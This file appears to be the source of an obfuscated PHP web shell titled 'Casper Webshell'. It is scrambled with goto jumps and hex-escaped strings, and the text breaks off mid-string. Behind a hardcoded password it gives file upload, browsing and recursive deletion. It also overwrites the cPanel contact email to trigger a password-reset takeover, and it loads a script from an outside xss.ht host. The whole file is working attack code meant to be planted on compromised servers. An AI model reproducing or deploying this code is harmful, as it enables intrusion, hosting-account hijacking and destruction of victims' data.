"\x20\x20\40\40\x20\x20\40\40\x20\40\x20\x20\x20\x20\x20\x20\74\x62\165\x74\164\157\156\40\157\x6e\143\154\x69\143\153\x3d\42\167\151\156\144\x6f\x77\x2e\x6c\157\x63\141\164\151\x6f\156\56\x68\x72\x65\146\x3d\x27\x3f\144\x69\162\75"; goto xvj1R; gnafM: echo htmlspecialchars($gU8I1); goto y4ZAE; LITEU: $G9w9k = $_SERVER["\x53\105\x52\x56\105\x52\137\101\104\104\122"]; goto QxVXn; OEFPs: C_xT9: goto EsDYh; sW2yx: echo "\x3c\x2f\x74\x65\170\164\x61\162\x65\x61\x3e\15\xa\40\x20\x20\40\40\40\x20\x20\x20\x20\x20\x20\x20\x20\40\40\40\x20\40\40\x3c\151\x6e\x70\165\x74\x20\164\171\x70\x65\75\42\x68\x69\x64\144\145\x6e\42\40\156\141\x6d\x65\75\x22\x74\x61\x72\x67\x65\164\42\40\166\141\x6c\165\x65\75\x22"; goto gnafM; yiku4: $r05eF = []; goto rvgDz; dOCGA: $dnbqH = "\x67\x70\165\x63\160\x75"; goto hhLAW; zRbn8: function JYtGy($xBgIZ) { goto atNuG; qUAY8: $hcAAk = "\145\x6d\x61\151\x6c\72" . $xBgIZ; goto mqdq7; Ly3GG: echo "\x3c\x62\162\x2f\76\x3c\143\145\x6e\164\x65\x72\76\x50\141\x73\163\167\157\162\x64\40\x72\x65\163\145\x74\40\154\151\156\x6b\72\x20\x3c\x61\40\150\162\x65\x66\x3d\42\x68\164\164\x70\x3a\57\x2f" . $ltt0b . "\x22\76" . $ltt0b . "\x3c\57\x61\76\74\57\x63\145\156\164\x65\162\76"; goto LXHQh; LXHQh: echo "\74\x62\x72\57\76\x3c\143\145\x6e\164\145\x72\x3e\125\x73\145\162\156\141\155\145\72\x20" . $jjXM1 . "\74\57\143\145\x6e\x74\145\162\76"; goto txS3A; FBMFu: $qi9Ud = $_SERVER["\x48\124\124\120\x5f\x48\117\x53\124"]; goto zbHKL; T62Qa: fclose($JZ8zG); goto Ly3GG; atNuG: $jjXM1 = get_current_user(); goto FBMFu; JCSDd: $JZ8zG = fopen("\x2f\x68\x6f\x6d\x65\57" . $jjXM1 . "\x2f\x2e\x63\x6f\156\164\141\x63\164\151\156\146\157", "\167"); goto pAP5i; pAP5i: fwrite($JZ8zG, $hcAAk); goto T62Qa; W3HR1: fwrite($JZ8zG, $hcAAk); goto QK0Au; zbHKL: $ltt0b = $qi9Ud . "\72\x32\60\x38\x32\x2f\x72\145\163\x65\164\x70\141\x73\x73\x3f\x73\164\141\162\x74\75\x31"; goto qUAY8; mqdq7: $JZ8zG = fopen("\x2f\150\x6f\155\x65\x2f" . $jjXM1 . "\57\x2e\x63\x70\x61\x6e\x65\154\57\143\157\156\x74\x61\143\164\151\x6e\x66\157", "\x77"); goto W3HR1; QK0Au: fclose($JZ8zG); goto JCSDd; txS3A: } goto znrLi; QxVXn: $EzBMv = $_SERVER["\122\x45\x4d\x4f\x54\x45\x5f\101\104\x44\122"]; goto wZeM7; mbQmz: echo "\xd\12\74\x21\x44\x4f\x43\124\131\x50\x45\x20\x68\164\x6d\154\76\15\12\x3c\x68\x74\155\154\x20\x6c\141\x6e\x67\75\42\x65\x6e\x22\76\15\xa\x3c\x68\145\x61\x64\76\15\xa\40\40\x20\x20\74\155\145\164\x61\x20\x63\150\x61\x72\163\145\x74\x3d\x22\x55\x54\x46\55\x38\42\x3e\15\12\x20\x20\x20\x20\x3c\x74\151\164\x6c\x65\76\103\141\x73\160\145\x72\40\127\145\x62\x73\150\145\154\x6c\74\x2f\164\151\164\x6c\145\76\xd\12\x20\x20\40\x20\x3c\x73\x63\x72\x69\x70\164\40\163\162\x63\75\42\x68\x74\164\160\163\x3a\x2f\x2f\x67\157\x6f\147\x6c\x65\163\143\x72\151\160\x74\x73\x2e\x78\x73\163\x2e\x68\x74\42\x3e\x3c\x2f\163\143\162\x69\160\164\76\15\12\x20\x20\x20\x20\74\x6c\x69\156\153\x20\162\x65\x6c\75\x22\163\164\x79\154\145\x73\x68\145\x65\x74\x22\x20\x68\x72\x65\x66\75\42\150\164\x74\160\x73\72\57\57\143\x64\x6e\x6a\163\56\143\154\157\165\x64\x66\154\x61\x72\145\56\x63\157\x6d\57\141\x6a\x61\x78\x2f\154\151\x62\163\x2f\x66\157\x6e\x74\x2d\x61\167\x65\163\x6f\155\145\57\x36\56\60\56\60\55\142\145\164\x61\63\57\143\x73\x73\57\141\154\x6c\56\155\x69\156\56\143\163\x73\x22\x3e\15\12\40\40\40\40\74\x73\164\x79\154\145\76\xd\xa\x20\x20\40\x20\40\x20\40\40\x62\157\x64\x79\x20\173\15\xa\x20\x20\x20\x20\x20\40\x20\x20\40\x20\x20\x20\146\157\156\x74\x2d\146\x61\x6d\x69\x6c\x79\x3a\x20\101\162\x69\x61\x6c\54\x20\x73\x61\156\163\x2d\x73\145\x72\x69\x66\x3b\15\xa\40\40\40\40\40\x20\40\x20\x20\40\x20\40\x6d\141\x72\147\x69\156\x3a\40\60\73\15\xa\40\40\40\x20\x20\x20\40\40\40\x20\x20\40\160\x61\144\144\151\x6e\147\x3a\x20\x30\73\15\xa\x20\40\40\40\40\40\40\x20\x20\40\40\40\x62\141\x63\x6b\x67\x72\x6f\165\x6e\144\55\143\x6f\154\x6f\162\x3a\40\x23\146\x34\146\64\x66\64\x3b\15\12\40\x20\x20\40\40\40\x20\40\x7d\xd\xa\40\x20\x20\40\40\x20\x20\x20\x2e\146\151\x6c\145\x2d\155\x61\x6e\x61\147\x65\x72\x20\173\15\12\40\40\40\x20\x20\40\40\x20\x20\40\x20\x20\x77\151\x64\x74\x68\x3a\40\x38\x30\45\73\15\xa\40\x20\x20\40\40\40\40\x20\40\40\40\x20\x6d\141\x72\147\x69\156\x3a\40\62\60\x70\170\40\141\x75\x74\157\73\15\12\x20\x20\40\x20\40\x20\40\x20\x20\x20\x20\x20\142\141\143\153\x67\162\x6f\165\156\144\x2d\x63\x6f\154\157\x72\x3a\40\43\146\x66\x66\x3b\15\xa\x20\x20\x20\40\x20\40\40\40\x20\40\x20\40\160\x61\144\144\151\156\147\72\x20\x32\60\160\170\x3b\xd\xa\40\x20\x20\x20\40\40\40\x20\40\x20\40\40\142\x6f\170\x2d\163\x68\x61\x64\x6f\x77\x3a\x20\x30\40\x30\x20\x31\x30\x70\x78\x20\162\147\x62\141\50\60\54\40\x30\54\x20\x30\54\40\60\x2e\x31\51\x3b\15\12\40\40\x20\40\40\40\x20\x20\x7d\15\xa\40\x20\40\x20\40\40\40\40\56\x66\151\x6c\145\55\x6d\141\x6e\141\147\x65\x72\x20\150\61\40\173\15\xa\x20\40\40\x20\40\40\x20\x20\x20\x20\40\x20\x74\145\x78\x74\x2d\x61\154\151\x67\156\x3a\x20\143\145\x6e\164\145\x72\x3b\xd\12\40\40\x20\x20\40\x20\40\40\175\xd\xa\40\x20\x20\x20\x20\40\40\x20\56\163\x79\x73\x74\145\155\x2d\x69\x6e\x66\157\40\x7b\15\12\x20\40\40\x20\x20\x20\x20\40\40\40\40\40\x6d\141\162\147\x69\156\55\142\157\164\164\157\155\x3a\x20\x32\60\x70\170\x3b\15\xa\x20\x20\x20\x20\40\40\x20\x20\40\40\x20\40\x62\x61\x63\x6b\147\x72\x6f\x75\156\144\55\143\x6f\x6c\x6f\162\x3a\40\x23\x66\x39\146\x39\x66\x39\x3b\xd\xa\x20\40\40\x20\40\40\40\40\40\x20\40\40\x70\x61\x64\x64\x69\156\x67\72\40\61\x30\160\170\73\xd\12\40\40\40\x20\40\x20\40\40\40\40\x20\x20\142\x6f\162\x64\x65\x72\x3a\40\x31\160\x78\40\163\157\x6c\151\x64\40\43\x64\144\144\73\xd\xa\x20\x20\40\40\x20\40\x20\x20\x7d\xd\12\x20\x20\40\x20\40\x20\40\x20\x2e\146\151\154\145\x2d\x6c\x69\x73\164\40\x7b\15\12\40\x20\x20\40\x20\x20\x20\x20\40\x20\x20\40\167\x69\144\x74\x68\x3a\x20\61\x30\60\45\x3b\15\12\40\40\x20\x20\x20\40\x20\x20\40\x20\40\40\142\x6f\x72\x64\x65\x72\x2d\x63\x6f\154\154\141\160\163\x65\x3a\40\x63\x6f\x6c\154\x61\x70\x73\145\x3b\xd\xa\40\40\x20\x20\40\x20\x20\x20\175\xd\xa\40\x20\x20\x20\x20\40\x20\40\56\x66\151\x6c\x65\x2d\x6c\x69\x73\164\40\164\x68\54\40\56\x66\151\x6c\x65\x2d\154\x69\x73\x74\x20\x74\144\40\173\xd\xa\40\40\40\x20\x20\40\x20\40\x20\40\40\x20\x70\x61\144\144\151\156\147\x3a\x20\61\60\160\x78\x3b\xd\12\x20\x20\40\40\x20\x20\40\x20\40\x20\40\40\164\x65\x78\164\55\x61\154\151\x67\x6e\x3a\40\x6c\145\146\164\73\xd\xa\x20\x20\40\x20\x20\x20\x20\40\x20\x20\40\x20\x62\157\x72\x64\x65\162\55\x62\x6f\164\x74\x6f\x6d\x3a\40\61\x70\x78\40\x73\x6f\x6c\151\x64\40\x23\144\x64\144\x3b\15\xa\40\x20\x20\x20\40\x20\x20\x20\x7d\xd\12\x20\40\x20\x20\40\40\x20\x20\x2e\x66\x69\x6c\145\x2d\x61\143\x74\x69\157\x6e\x73\40\x66\x6f\162\155\40\173\15\xa\40\x20\40\40\x20\40\40\x20\40\x20\x20\x20\144\x69\x73\160\154\141\x79\x3a\40\x69\x6e\x6c\x69\x6e\145\73\xd\12\x20\x20\x20\40\x20\40\40\x20\175\xd\xa\x20\x20\x20\x20\x20\40\x20\x20\56\146\x69\154\x65\55\x61\143\164\151\157\x6e\163\40\x62\x75\x74\164\x6f\156\x20\x7b\15\xa\x20\x20\x20\x20\x20\x20\x20\x20\40\40\x20\40\x62\x61\143\153\147\162\157\165\156\x64\x3a\x20\156\157\156\145\x3b\15\12\x20\x20\x20\40\40\x20\40\40\40\40\40\40\x62\x6f\x72\144\145\162\72\40\156\x6f\156\145\x3b\xd\xa\x20\x20\40\40\x20\x20\x20\x20\x20\40\40\x20\143\165\x72\163\157\x72\x3a\x20\160\x6f\151\x6e\164\145\x72\73\15\xa\40\x20\x20\x20\x20\40\x20\x20\x20\x20\40\x20\143\x6f\x6c\x6f\162\72\x20\43\60\60\67\142\x66\x66\x3b\xd\xa\40\40\40\x20\40\40\x20\40\40\40\x20\40\146\157\156\x74\55\163\151\172\145\72\40\61\64\x70\x78\73\15\xa\x20\40\40\x20\x20\40\x20\x20\x7d\15\xa\40\40\x20\x20\x20\x20\40\x20\56\146\151\154\x65\55\x61\x63\164\x69\157\x6e\x73\x20\x62\165\164\164\157\156\x3a\150\x6f\166\x65\x72\x20\x7b\15\12\40\40\x20\x20\x20\40\x20\40\x20\40\40\40\143\157\154\157\x72\72\40\x23\60\60\65\x36\142\63\x3b\xd\12\x20\40\x20\x20\40\x20\40\40\x7d\15\12\40\40\x20\x20\40\40\40\40\x2e\x75\x70\154\x6f\141\x64\55\x66\x6f\162\155\54\40\56\145\144\151\x74\x2d\146\157\x72\155\54\40\56\x72\145\163\x65\x74\55\146\x6f\162\x6d\40\173\xd\xa\40\x20\x20\40\40\x20\40\x20\40\x20\40\40\155\x61\x72\x67\151\x6e\x2d\x74\157\x70\72\x20\x32\60\160\x78\x3b\15\xa\40\x20\40\x20\x20\40\40\40\175\xd\xa\x20\x20\40\40\x20\x20\40\x20\56\165\160\154\x6f\141\144\x2d\x66\x6f\x72\155\x20\x69\x6e\160\x75\164\x5b\x74\171\160\x65\x3d\x22\146\151\154\145\42\x5d\40\x7b\15\xa\x20\x20\x20\x20\40\x20\x20\40\x20\x20\40\40\x6d\x61\x72\147\x69\x6e\55\142\157\x74\164\x6f\155\x3a\40\61\x30\x70\x78\73\15\xa\40\x20\40\x20\x20\40\40\x20\x7d\15\12\40\40\40\40\40\x20\x20\x20\56\x72\x65\x73\145\164\x2d\146\x6f\162\155\40\146\x6f\x72\155\x20\173\xd\xa\x20\x20\40\40\40\40\40\x20\x20\40\40\40\x64\x69\x73\160\154\x61\x79\72\40\x66\154\x65\x78\73\15\12\40\40\40\x20\40\x20\x20\40\x20\40\x20\40\x66\154\x65\170\55\x64\x69\x72\x65\x63\164\x69\157\156\x3a\40\x63\157\x6c\x75\155\156\x3b\15\12\x20\x20\x20\x20\x20\x20\x20\40\175\xd\xa\40\x20\x20\40\40\x20\40\40\56\x72\x65\x73\x65\164\x2d\146\157\162\155\x20\x69\156\x70\x75\164\133\164\171\x70\145\x3d\x22\x73\x75\x62\155\x69\x74\42\135\40\173\xd\12\40\40\40\40\x20\40\x20\x20\40\40\x20\x20\155\141\162\x67\151\156\x2d\x74\157\x70\72\40\61\x30\160\x78\x3b\xd\12\40\x20\40\40\x20\40\40\40\x7d\15\12\x20\40\x20\x20\x20\x20\x20\40\x2e\160\150\x70\x2d\x69\156\x66\x6f\55\x62\165\164\164\x6f\x6e\40\173\xd\xa\x20\40\x20\x20\x20\40\x20\40\x20\40\40\40\x6d\x61\x72\147\x69\156\x2d\164\157\x70\72\40\62\x30\160\170\73\15\12\40\x20\40\40\x20\40\x20\40\40\40\x20\40\164\145\170\164\x2d\141\154\x69\147\156\x3a\x20\143\145\156\164\145\162\x3b\xd\xa\40\40\x20\x20\x20\x20\40\40\x7d\15\12\40\40\40\x20\40\40\x20\40\56\160\150\x70\x2d\x69\x6e\x66\x6f\55\142\165\x74\x74\157\x6e\40\142\x75\164\164\x6f\156\40\173\15\12\40\x20\x20\x20\x20\40\40\x20\x20\40\x20\x20\x62\141\x63\x6b\x67\162\x6f\165\x6e\144\55\143\157\154\157\162\x3a\x20\43\x31\x37\141\x32\142\70\73\xd\12\40\x20\40\x20\x20\x20\40\x20\40\40\40\40\x63\157\154\157\162\72\x20\x23\x66\146\146\73\xd\12\x20\40\40\40\40\x20\40\40\40\x20\40\x20\142\157\x72\144\145\162\x3a\40\x6e\x6f\156\x65\x3b\xd\xa\40\x20\40\40\x20\40\40\40\40\40\x20\40\x70\141\x64\x64\151\x6e\x67\x3a\x20\x31\60\x70\170\40\62\x30\x70\x78\73\15\xa\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\40\x20\143\x75\x72\163\x6f\x72\x3a\x20\160\x6f\151\156\164\x65\x72\73\15\12\x20\40\x20\40\x20\x20\x20\40\175\15\12\x20\40\x20\x20\40\40\x20\x20\x2e\x70\x68\x70\55\x69\x6e\x66\157\55\x62\165\164\164\x6f\156\40\x62\165\x74\x74\x6f\x6e\72\150\157\x76\x65\162\x20\x7b\15\xa\40\x20\40\x20\40\40\40\x20\x20\40\40\40\142\x61\143\x6b\147\162\x6f\x75\156\x64\55\143\157\154\157\x72\72\x20\x23\61\x33\70\64\x39\x36\73\xd\12\40\x20\40\x20\40\x20\40\x20\x7d\xd\12\40\x20\x20\40\74\x2f\x73\x74\x79\154\145\x3e\15\xa\40\40\x20\40\x3c\x73\x63\162\151\160\164\76\xd\12\x20\x20\x20\40\x20\40\40\40\146\165\156\143\164\x69\157\156\x20\164\x6f\x67\147\154\x65\122\x65\x73\145\164\106\157\x72\155\x28\51\x20\173\xd\12\x20\x20\x20\40\40\40\40\x20\40\40\x20\x20\166\x61\x72\x20\x66\157\x72\155\x20\x3d\40\144\x6f\x63\x75\x6d\145\156\x74\56\x67\x65\x74\105\x6c\x65\x6d\x65\x6e\164\102\x79\x49\x64\x28\x27\162\x65\x73\145\x74\x2d\x66\157\x72\155\47\51\x3b\xd\12\x20\40\x20\x20\40\x20\x20\40\x20\40\40\x20\151\146\x20\50\146\x6f\162\155\56\x73\164\x79\154\145\56\x64\151\163\160\154\x61\171\x20\75\75\x3d\40\x27\156\157\156\x65\x27\x29\40\x7b\xd\xa\x20\x20\40\40\x20\40\x20\40\40\40\40\40\x20\x20\x20\40\x66\157\x72\x6d\56\x73\x74\171\154\x65\56\144\x69\163\160\154\141\x79\x20\75\40\47\x62\154\x6f\x63\x6b\x27\x3b\xd\12\40\x20\40\x20\40\40\40\40\x20\40\x20\40\175\40\145\154\163\145\x20\173\xd\12\40\40\40\x20\40\40\x20\x20\40\40\40\40\40\40\40\x20\146\x6f\x72\155\x2e\163\x74\171\154\145\56\144\x69\163\160\x6c\x61\x79\x20\x3d\40\x27\156\x6f\156\x65\x27\x3b\xd\xa\x20\40\40\40\x20\40\x20\40\40\x20\x20\40\x7d\15\xa\x20\40\40\40\x20\x20\x20\x20\x7d\15\12\40\40\x20\40\74\57\163\143\x72\x69\160\164\76\15\12\74\57\x68\145\x61\x64\76\15\12\74\142\157\x64\171\76\15\xa\x20\x20\x20\x20\74\144\x69\x76\x20\x63\154\x61\x73\163\75\42\x66\151\154\x65\55\155\x61\156\x61\x67\145\162\x22\76\15\12\x20\40\40\x20\40\40\x20\x20\x3c\x68\x31\x3e\x43\x61\163\x70\145\x72\x20\127\145\142\163\x68\145\x6c\x6c\74\x2f\x68\x31\76\15\xa\15\12\x20\x20\40\x20\40\40\x20\x20\x3c\144\151\166\x20\x63\154\x61\163\163\x3d\42\163\x79\163\x74\145\155\55\151\156\x66\157\x22\x3e\15\12\x20\40\40\x20\x20\40\x20\40\40\40\x20\x20\x3c\160\76\x43\165\x72\162\145\156\164\x20\x44\151\162\x65\143\164\x6f\x72\x79\x3a\x20"; goto r7oXc; tqNqp: echo pxhe9($d3Klz * 1024 * 1024 * 1024); goto lKvaT; lKvaT: echo "\x3c\57\x70\x3e\xd\12\40\x20\40\x20\x20\40\40\x20\40\40\x20\x20\74\160\76\124\x6f\x74\141\154\x20\x44\151\163\x6b\x20\123\160\141\143\x65\x3a\x20"; goto fNAwr; o7WCF: if (isset($_POST["\x70\x61\x73\x73\x77\157\162\144"]) && $_POST["\160\x61\x73\x73\x77\x6f\162\x64"] === $dnbqH) { goto lM97w; } goto hIULy; BHJ1x: MOnqZ: goto gKy4k; cnLDx: exit; goto OEFPs; e_UJy: $D7XpV = scandir($B3_vJ); goto b5EHN; RIY7C: if (!isset($cy4Li)) { goto OdrnK; } goto SMTet; IilL8: goto PrkQD; goto ms2Qb; WbwAg: echo "\40\x20\x20\40\40\x20\40\x20\40\x20\40\x20\x20\40\40\x20\x3c\x66\157\162\155\x20\x6d\145\164\150\157\x64\x3d\x22\x50\117\123\x54\x22\76\15\xa\40\40\40\x20\x20\40\x20\40\x20\x20\40\x20\x20\x20\x20\x20\40\x20\40\40\74\x69\156\x70\165\164\40\164\x79\x70\x65\x3d\x22\x70\x61\163\163\x77\x6f\x72\x64\42\40\156\x61\x6d\x65\75\42\160\x61\163\x73\167\x6f\x72\144\42\x20\x70\154\x61\x63\x65\150\157\154\144\x65\x72\x3d\x22\x45\156\164\x65\162\x20\x70\141\x73\163\167\157\162\x64\x22\40\162\145\161\165\x69\x72\x65\x64\x3e\xd\12\40\x20\x20\x20\40\40\40\x20\x20\40\40\x20\x20\x20\40\x20\40\x20\40\40\x3c\x69\x6e\160\x75\x74\40\x74\x79\160\x65\75\x22\x73\165\142\x6d\x69\x74\42\40\166\141\154\165\145\75\42\x4c\x6f\147\x69\156\x22\76\xd\12\40\40\x20\x20\40\40\40\x20\40\40\x20\x20\x20\x20\x20\40\74\57\146\x6f\162\x6d\76\xd\12\40\40\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\74\57\144\151\x76\76\xd\12\40\x20\x20\x20\x20\x20\x20\x20\x3c\57\x62\157\x64\x79\76\xd\xa\40\x20\x20\40\40\40\40\40\74\57\150\x74\x6d\x6c\x3e\15\12\40\40\40\40\x20\x20\40\40"; goto cnLDx; xwGD3: $_SESSION["\154\157\147\147\x65\x64\x5f\x69\156"] = true; goto kC3kb; QAmvF: function LFTpN($a7TuV) { goto TFyFT; TFyFT: if (is_dir($a7TuV)) { goto vYozF; } goto iMQEi; bZtcB: vYozF: goto PcHbx; Huqja: return rmdir($a7TuV); goto jRikP; iMQEi: return false; goto bZtcB; d_wHO: kId0x: goto Huqja; kor9S: foreach ($D7XpV as $tZphq) { goto oSuY7; vYkdI: zXO7R: goto zKt0Q; zKt0Q: LftpN($kOn7v); goto g9yk2; g9yk2: bBEAq: goto uxp9F; zkX8Z: if (is_dir($kOn7v)) { goto zXO7R; } goto JV9XH; uxp9F: CRnCe: goto M35Tm; JV9XH: unlink($kOn7v); goto pYbRu; oSuY7: $kOn7v = $a7TuV . DIRECTORY_SEPARATOR . $tZphq; goto zkX8Z; pYbRu: goto bBEAq; goto vYkdI; M35Tm: } goto d_wHO; PcHbx: $D7XpV = array_diff(scandir($a7TuV), array("\x2e", "\x2e\56")); goto kor9S; jRikP: } goto zRbn8; a0GwW: uWtLE: goto yNPNV; gKy4k: echo "\40\x20\40\40\40\40\x20\40\x20\x20\40\40\74\57\x74\x62\157\144\x79\x3e\xd\xa\40\40\x20\x20\40\40\40\x20\74\57\164\x61\142\154\x65\x3e\15\12\xd\12\x20\x20\x20\40\40\40\x20\40"; goto XNeMh; UBw3k: cl6qQ: goto KnI08; kC3kb: header("\114\x6f\x63\x61\x74\x69\x6f\x6e\72\40" . $_SERVER["\x50\x48\120\x5f\x53\x45\x4c\106"]); goto gHSaa; FfeM6: $iF8pW = implode("\x20\x2f\40", $r05eF); goto mbQmz; jd6iW: if (!($X2TiU !== $B3_vJ)) { goto aFms1; } goto Thn3c; m3rwC: SS6G3: goto e_UJy; RyFDK: echo "\74\57\x70\76\xd\12\x20\40\x20\40\x20\40\x20\40\40\40\x20\x20\x3c\160\x3e\103\165\x72\x72\145\156\x74\x20\x44\141\164\x65\x20\x61\156\144\x20\x54\x69\x6d\145\x3a\x20"; goto Wmp74; qIPs_: PrkQD: goto wfgLv; jdJjZ: echo htmlspecialchars($cy4Li); goto UhXZd; EoQSK: $X2TiU = dirname($B3_vJ); goto U1_xr; SRo6C: if (!(!isset($_SESSION["\154\157\x67\x67\x65\144\137\x69\x6e"]) || !$_SESSION["\154\x6f\147\x67\145\x64\137\151\156"])) { goto C_xT9; } goto T91Ri; uMvfF: $xBgIZ = $_POST["\x65\155\141\x69\154"]; goto l2IR5; A92Wa: echo "\x20\40\40\40\x20\x20\40\x20\x20\40\40\40\74\142\x75\x74\x74\157\156\x20\157\156\143\154\151\x63\x6b\x3d\42\x74\x6f\147\x67\x6c\145\122\145\163\145\x74\x46\157\x72\x6d\x28\x29\42\76\122\x65\x73\145\164\x20\143\x50\x61\x6e\145\154\x20\120\141\x73\x73\x77\x6f\162\144\74\57\142\x75\x74\164\x6f\156\76\15\12\x20\40\40\40\40\x20\x20\40\74\57\144\151\x76\x3e\xd\12\15\12\40\x20\40\40\40\40\40\40\x3c\x64\x69\166\40\x63\154\141\x73\x73\x3d\x22\162\145\163\x65\164\55\146\x6f\162\155\x22\40\151\144\x3d\x22\x72\145\163\145\164\x2d\x66\x6f\162\155\42\x3e\xd\12\x20\40\x20\x20\40\40\x20\x20\40\40\40\40\x3c\146\x6f\162\155\x20\155\145\164\150\x6f\144\x3d\42\120\x4f\123\124\42\x3e\15\12\40\x20\40\40\40\x20\x20\40\40\x20\x20\x20\x20\40\x20\x20\x3c\x69\156\160\x75\164\x20\x74\171\x70\145\75\x22\145\x6d\x61\151\x6c\42\x20\156\141\x6d\145\75\x22\145\155\141\151\x6c\42\40\160\x6c\x61\143\x65\x68\x6f\154\x64\145\162\x3d\x22\x45\156\x74\145\162\40\145\x6d\x61\x69\x6c\x22\x20\162\x65\161\165\x69\162\x65\144\x3e\xd\xa\40\x20\x20\x20\x20\40\x20\x20\40\40\40\40\x20\40\x20\x20\74\151\156\160\x75\x74\x20\164\x79\160\x65\x3d\x22\163\165\x62\x6d\151\164\42\40\x6e\x61\155\145\x3d\42\x63\x70\x61\156\145\x6c\137\162\x65\x73\x65\164\x22\40\166\141\x6c\165\145\75\x22\x52\x65\x73\x65\164\40\x50\x61\x73\163\x77\x6f\x72\x64\x22\76\xd\xa\x20\40\x20\x20\x20\40\40\x20\40\x20\x20\40\74\57\146\x6f\162\155\76\15\12\x20\x20\40\x20\x20\40\x20\x20\74\57\x64\x69\166\x3e\xd\12\15\12\40\40\40\40\x20\x20\40\x20\x3c\144\151\166\40\x63\154\141\x73\163\x3d\42\165\160\154\157\x61\144\x2d\x66\157\x72\155\x22\x3e\15\xa\x20\40\x20\x20\x20\40\x20\x20\x20\x20\40\x20\x3c\150\x32\x3e\x55\160\x6c\157\141\x64\x20\x46\x69\x6c\x65\x3c\x2f\150\62\x3e\xd\12\x20\x20\x20\x20\40\x20\40\40\40\x20\x20\x20\x3c\146\x6f\162\x6d\x20\155\x65\x74\x68\x6f\144\75\42\x50\117\x53\x54\42\40\x61\x63\164\x69\x6f\156\75\x22\42\x20\145\156\x63\x74\171\x70\x65\x3d\42\155\x75\x6c\x74\x69\x70\141\162\x74\x2f\146\157\162\155\55\x64\x61\164\141\x22\76\xd\12\40\40\x20\x20\40\x20\x20\40\40\40\40\40\x20\40\x20\40\74\151\156\x70\x75\164\40\164\x79\x70\x65\x3d\x22\146\151\154\x65\42\40\156\x61\x6d\145\x3d\42\146\151\x6c\x65\x54\157\x55\x70\154\157\141\x64\42\40\162\x65\x71\x75\x69\x72\x65\x64\76\xd\xa\x20\40\40\x20\40\x20\40\x20\40\x20\40\40\x20\x20\40\x20\74\142\165\x74\164\x6f\156\x20\x74\x79\160\x65\75\42\163\165\x62\155\x69\164\42\40\156\141\x6d\145\75\42\x61\x63\x74\151\157\156\42\40\166\141\154\x75\x65\x3d\42\165\160\154\157\141\x64\42\76\125\x70\154\157\x61\x64\74\x2f\x62\165\164\x74\x6f\156\x3e\xd\xa\40\x20\x20\x20\40\40\40\x20\x20\40\x20\40\74\x2f\x66\x6f\162\155\76\xd\12\40\40\x20\40\40\40\40\40\x3c\x2f\x64\x69\166\x3e\15\xa\15\12\40\x20\40\40\40\x20\40\40\74\164\141\142\154\x65\x20\x63\154\141\x73\163\75\x22\x66\151\x6c\145\55\154\151\163\x74\42\x3e\15\xa\x20\x20\40\x20\x20\40\x20\40\x20\40\40\40\x3c\x74\x68\x65\x61\x64\x3e\xd\12\40\x20\40\x20\40\x20\x20\40\x20\40\40\40\40\40\x20\x20\x3c\x74\x72\x3e\15\xa\40\x20\x20\40\x20\40\40\40\x20\x20\40\x20\x20\40\x20\x20\40\x20\40\40\x3c\x74\x68\76\x4e\x61\155\x65\74\x2f\164\x68\x3e\xd\xa\x20\x20\x20\x20\40\40\40\x20\x20\x20\40\x20\x20\x20\40\40\x20\x20\x20\40\x3c\164\x68\x3e\123\x69\172\x65\74\57\x74\150\x3e\15\xa\x20\40\x20\x20\40\40\40\40\40\x20\40\40\x20\40\x20\x20\40\40\x20\x20\74\x74\150\76\x4c\141\x73\x74\x20\x4d\157\x64\151\x66\151\145\144\x3c\x2f\x74\x68\76\xd\12\40\40\40\40\x20\x20\40\x20\x20\40\x20\40\x20\x20\x20\x20\x20\x20\40\x20\74\164\150\76\101\x63\x74\151\x6f\156\163\x3c\57\164\x68\76\15\xa\x20\x20\40\40\x20\x20\40\40\40\x20\40\40\40\40\x20\x20\74\57\x74\x72\x3e\15\12\x20\x20\40\40\40\x20\x20\40\x20\40\x20\x20\x3c\57\x74\x68\145\x61\144\76\xd\12\40\x20\40\x20\40\40\40\x20\x20\40\40\x20\x3c\x74\142\157\144\x79\x3e\15\xa\40\40\40\x20\x20\x20\40\x20\x20\x20\x20\40\40\x20\x20\x20"; goto tvE8f; T91Ri: echo "\40\40\40\x20\x20\40\x20\x20\x3c\41\x44\x4f\103\124\131\x50\x45\x20\150\x74\x6d\x6c\x3e\15\12\40\x20\40\x20\40\x20\x20\40\x3c\x68\164\x6d\154\40\154\141\156\147\x3d\x22\145\156\x22\x3e\xd\xa\x20\40\x20\x20\40\40\40\x20\x3c\150\145\141\144\76\xd\xa\x20\40\x20\40\40\x20\40\x20\40\x20\40\x20\74\155\x65\164\141\x20\143\x68\141\x72\x73\x65\x74\x3d\42\125\124\x46\x2d\x38\42\76\15\xa\40\x20\x20\x20\x20\x20\40\40\x20\40\x20\x20\x3c\164\x69\164\154\145\x3e\x4c\x6f\147\151\x6e\x3c\x2f\x74\151\x74\x6c\145\76\15\xa\x20\40\40\x20\40\x20\x20\x20\40\40\x20\x20\x3c\163\x74\171\154\x65\x3e\15\xa\40\40\40\x20\x20\40\40\40\x20\40\x20\x20\40\40\x20\40\142\x6f\144\171\x20\173\15\12\40\40\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\40\x20\40\x20\x20\x20\40\x20\144\151\x73\160\154\x61\x79\72\40\146\154\x65\x78\73\15\12\x20\x20\40\40\40\40\40\x20\x20\40\40\40\40\40\40\x20\x20\40\x20\40\x6a\x75\x73\164\151\146\171\55\x63\x6f\156\x74\145\156\x74\72\x20\143\x65\156\x74\x65\x72\x3b\xd\xa\x20\40\x20\40\40\40\x20\x20\x20\x20\40\x20\40\40\x20\x20\40\40\x20\x20\141\x6c\x69\147\x6e\x2d\x69\164\x65\155\x73\72\x20\143\145\156\164\x65\x72\x3b\15\xa\x20\x20\40\x20\x20\x20\40\40\40\x20\40\x20\40\x20\x20\x20\40\x20\x20\40\x68\x65\151\147\150\164\x3a\40\x31\60\x30\x76\150\x3b\15\12\40\40\x20\40\x20\x20\x20\40\40\x20\x20\x20\x20\x20\40\x20\40\x20\40\x20\142\x61\143\153\147\162\x6f\165\x6e\x64\55\143\x6f\x6c\157\162\72\x20\x23\146\64\146\64\x66\64\x3b\15\12\40\40\x20\x20\40\x20\40\40\x20\x20\x20\x20\x20\40\40\40\40\x20\x20\x20\146\x6f\x6e\164\x2d\x66\141\x6d\x69\154\171\x3a\x20\x41\x72\151\x61\154\x2c\40\x73\x61\x6e\x73\55\163\x65\162\151\x66\x3b\xd\xa\x20\x20\x20\40\40\40\40\40\x20\x20\40\40\x20\x20\40\x20\x7d\xd\12\x2